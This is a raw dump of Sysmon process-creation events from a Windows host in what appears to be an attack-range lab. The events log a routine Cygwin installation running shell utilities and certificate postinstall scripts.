14:56:01.967{A8622C2F-5401-6078-E40B-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E30B-00000000AE01}4336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056379Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.959{A8622C2F-5401-6078-E30B-00000000AE01}4336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.951{A8622C2F-5401-6078-E20B-00000000AE01}5744C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5401-6078-E10B-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.942{A8622C2F-5401-6078-E10B-00000000AE01}6332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.934{A8622C2F-5401-6078-E00B-00000000AE01}5996C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5401-6078-DF0B-00000000AE01}2084C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.926{A8622C2F-5401-6078-DF0B-00000000AE01}2084C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.910{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DD0B-00000000AE01}1612C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.902{A8622C2F-5401-6078-DD0B-00000000AE01}1612C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.893{A8622C2F-5401-6078-DC0B-00000000AE01}2408C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5401-6078-DB0B-00000000AE01}6700C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.885{A8622C2F-5401-6078-DB0B-00000000AE01}6700C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.877{A8622C2F-5401-6078-DA0B-00000000AE01}6556C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5401-6078-D90B-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.868{A8622C2F-5401-6078-D90B-00000000AE01}5084C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056259Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.816{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000056248Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.698{A8622C2F-5401-6078-D60B-00000000AE01}5108C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-D50B-00000000AE01}1156C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.689{A8622C2F-5401-6078-D50B-00000000AE01}1156C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-D40B-00000000AE01}3912C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.681{A8622C2F-5401-6078-D40B-00000000AE01}3912C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.568{A8622C2F-5401-6078-D30B-00000000AE01}6748C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-D20B-00000000AE01}1408C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.560{A8622C2F-5401-6078-D20B-00000000AE01}1408C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-D10B-00000000AE01}6672C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056198Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.551{A8622C2F-5401-6078-D10B-00000000AE01}6672C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056188Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.439{A8622C2F-5401-6078-D00B-00000000AE01}6332C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-CF0B-00000000AE01}1736C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056178Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.431{A8622C2F-5401-6078-CF0B-00000000AE01}1736C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-CE0B-00000000AE01}6416C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056168Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.423{A8622C2F-5401-6078-CE0B-00000000AE01}6416C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.307{A8622C2F-5401-6078-CD0B-00000000AE01}5804C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-CC0B-00000000AE01}1612C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056148Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.298{A8622C2F-5401-6078-CC0B-00000000AE01}1612C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-CB0B-00000000AE01}6336C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056138Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.290{A8622C2F-5401-6078-CB0B-00000000AE01}6336C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.173{A8622C2F-5401-6078-CA0B-00000000AE01}5628C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-C90B-00000000AE01}6268C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056118Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.165{A8622C2F-5401-6078-C90B-00000000AE01}6268C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-C80B-00000000AE01}4788C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056108Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.157{A8622C2F-5401-6078-C80B-00000000AE01}4788C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.027{A8622C2F-5401-6078-C70B-00000000AE01}5412C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5400-6078-C60B-00000000AE01}5220C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.998{A8622C2F-5400-6078-C60B-00000000AE01}5220C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5400-6078-C50B-00000000AE01}7016C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056078Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.989{A8622C2F-5400-6078-C50B-00000000AE01}7016C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.974{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C30B-00000000AE01}6968C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000056058Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.966{A8622C2F-5400-6078-C30B-00000000AE01}6968C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000056047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.958{A8622C2F-5400-6078-C20B-00000000AE01}2484C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5400-6078-C10B-00000000AE01}1408C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.950{A8622C2F-5400-6078-C10B-00000000AE01}1408C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-BE0B-00000000AE01}3912C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056027Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.937{A8622C2F-5400-6078-C00B-00000000AE01}5996C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-5400-6078-BF0B-00000000AE01}5864C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.928{A8622C2F-5400-6078-BF0B-00000000AE01}5864C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-BE0B-00000000AE01}3912C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056007Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.912{A8622C2F-5400-6078-BE0B-00000000AE01}3912C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-BD0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055997Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.904{A8622C2F-5400-6078-BD0B-00000000AE01}4300C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.895{A8622C2F-5400-6078-BC0B-00000000AE01}4476C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-BB0B-00000000AE01}4424C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055976Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.888{A8622C2F-5400-6078-BB0B-00000000AE01}4424C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055965Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 